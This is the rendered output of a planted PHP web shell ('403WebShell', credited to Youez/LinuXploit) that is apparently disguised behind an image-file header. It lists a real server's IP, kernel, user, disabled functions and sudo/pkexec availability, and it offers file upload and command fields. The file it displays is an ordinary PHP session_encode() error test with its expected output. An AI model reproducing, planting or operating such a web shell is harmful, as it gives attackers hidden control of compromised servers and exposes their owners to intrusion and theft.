????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 18.119.110.206
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/home/b8009/php-5.6.22/ext/session/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/home/b8009/php-5.6.22/ext/session/tests/session_encode_error2.phpt
--TEST--
Test session_encode() function : error functionality
--SKIPIF--
<?php include('skipif.inc'); ?>
--FILE--
<?php

ob_start();

/* 
 * Prototype : string session_encode(void)
 * Description : Encodes the current session data as a string
 * Source code : ext/session/session.c 
 */

echo "*** Testing session_encode() : error functionality ***\n";

// Get an unset variable
$unset_var = 10;
unset($unset_var);

class classA
{
    public function __toString() {
        return "Hello World!";
    }
}

$heredoc = <<<EOT
Hello World!
EOT;

$fp = fopen(__FILE__, "r");

// Unexpected values to be passed as arguments
$inputs = array(

       // Integer data
/*1*/  0,
       1,
       12345,
       -2345,

       // Float data
/*5*/  10.5,
       -10.5,
       12.3456789000e10,
       12.3456789000E-10,
       .5,

       // Null data
/*10*/ NULL,
       null,

       // Boolean data
/*12*/ true,
       false,
       TRUE,
       FALSE,
       
       // Empty strings
/*16*/ "",
       '',

       // Invalid string data
/*18*/ "Nothing",
       'Nothing',
       $heredoc,
       
       // Object data
/*21*/ new classA(),

       // Undefined data
/*22*/ @$undefined_var,

       // Unset data
/*23*/ @$unset_var,

       // Resource variable
/*24*/ $fp
);

$iterator = 1;
foreach($inputs as $input) {
    echo "\n-- Iteration $iterator --\n";
    var_dump(session_start());
    $_SESSION[$input] = "Hello World!";
    var_dump(session_encode());
    var_dump(session_destroy());
    $iterator++;
};

fclose($fp);
echo "Done";
ob_end_flush();
?>
--EXPECTF--
*** Testing session_encode() : error functionality ***

-- Iteration 1 --
bool(true)

Notice: session_encode(): Skipping numeric key 0 in %s on line %d
bool(false)
bool(true)

-- Iteration 2 --
bool(true)

Notice: session_encode(): Skipping numeric key 1 in %s on line %d
bool(false)
bool(true)

-- Iteration 3 --
bool(true)

Notice: session_encode(): Skipping numeric key 12345 in %s on line %d
bool(false)
bool(true)

-- Iteration 4 --
bool(true)

Notice: session_encode(): Skipping numeric key -2345 in %s on line %d
bool(false)
bool(true)

-- Iteration 5 --
bool(true)

Notice: session_encode(): Skipping numeric key 10 in %s on line %d
bool(false)
bool(true)

-- Iteration 6 --
bool(true)

Notice: session_encode(): Skipping numeric key -10 in %s on line %d
bool(false)
bool(true)

-- Iteration 7 --
bool(true)

Notice: session_encode(): Skipping numeric key %s in %s on line %d
bool(false)
bool(true)

-- Iteration 8 --
bool(true)

Notice: session_encode(): Skipping numeric key 0 in %s on line %d
bool(false)
bool(true)

-- Iteration 9 --
bool(true)

Notice: session_encode(): Skipping numeric key 0 in %s on line %d
bool(false)
bool(true)

-- Iteration 10 --
bool(true)
string(21) "|s:12:"Hello World!";"
bool(true)

-- Iteration 11 --
bool(true)
string(21) "|s:12:"Hello World!";"
bool(true)

-- Iteration 12 --
bool(true)

Notice: session_encode(): Skipping numeric key 1 in %s on line %d
bool(false)
bool(true)

-- Iteration 13 --
bool(true)

Notice: session_encode(): Skipping numeric key 0 in %s on line %d
bool(false)
bool(true)

-- Iteration 14 --
bool(true)

Notice: session_encode(): Skipping numeric key 1 in %s on line %d
bool(false)
bool(true)

-- Iteration 15 --
bool(true)

Notice: session_encode(): Skipping numeric key 0 in %s on line %d
bool(false)
bool(true)

-- Iteration 16 --
bool(true)
string(21) "|s:12:"Hello World!";"
bool(true)

-- Iteration 17 --
bool(true)
string(21) "|s:12:"Hello World!";"
bool(true)

-- Iteration 18 --
bool(true)
string(28) "Nothing|s:12:"Hello World!";"
bool(true)

-- Iteration 19 --
bool(true)
string(28) "Nothing|s:12:"Hello World!";"
bool(true)

-- Iteration 20 --
bool(true)
bool(false)
bool(true)

-- Iteration 21 --
bool(true)

Warning: Illegal offset type in %s on line 82
bool(false)
bool(true)

-- Iteration 22 --
bool(true)
string(21) "|s:12:"Hello World!";"
bool(true)

-- Iteration 23 --
bool(true)
string(21) "|s:12:"Hello World!";"
bool(true)

-- Iteration 24 --
bool(true)

Strict Standards: Resource ID#%d used as offset, casting to integer (%d) in %s on line %d

Notice: session_encode(): Skipping numeric key %d in %s on line %d
bool(false)
bool(true)
Done

Youez - 2016 - github.com/yon3zu
LinuXploit